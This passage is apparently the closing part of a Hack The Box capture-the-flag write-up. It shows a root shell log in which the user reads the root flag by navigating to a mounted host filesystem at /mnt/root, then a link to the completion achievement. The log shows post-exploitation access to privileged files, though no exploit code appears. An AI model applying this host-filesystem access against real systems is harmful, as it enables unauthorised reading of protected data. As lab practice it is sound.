~ # ^[[29;5Rid
id
uid=0(root) gid=0(root)
~ # cat /root/root.txt
cat /root/root.txt
cat: can't open '/root/root.txt': No such file or directory
~ # ^[[29;5Rcat /root/root.txt
cat /root/root.txt
cat: can't open '/root/root.txt': No such file or directory
~ # ^[[29;5Rcd /root
cd /root
~ # ^[[29;5Rls
ls
~ # ^[[29;5Rpwd
pwd
/root
~ # ^[[29;5Rls
ls
~ # ^[[29;5Rcd cd /mnt/root/
cd cd /mnt/root/
/bin/sh: cd: can't cd to cd: No such file or directory
~ # ^[[29;5Rcd cd /mnt/root/
cd cd /mnt/root/
/bin/sh: cd: can't cd to cd: No such file or directory
~ # ^[[29;5Rcd /mnt/root/
cd /mnt/root/
/mnt/root # ^[[29;13Rls
ls
bin         etc         lib64       mnt         run         sys
boot        home        libx32      opt         sbin        tmp
cdrom       lib         lost+found  proc        snap        usr
dev         lib32       media       root        srv         var
/mnt/root # ^[[29;13Rcd root
cd root
/mnt/root/root # ^[[29;18Rls
ls
root.txt  snap
/mnt/root/root # ^[[29;18Rcat root.txt
cat root.txt
32a3e0813bf2093db72555e47cfe036a
/mnt/root/root # ^[[29;18R

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/259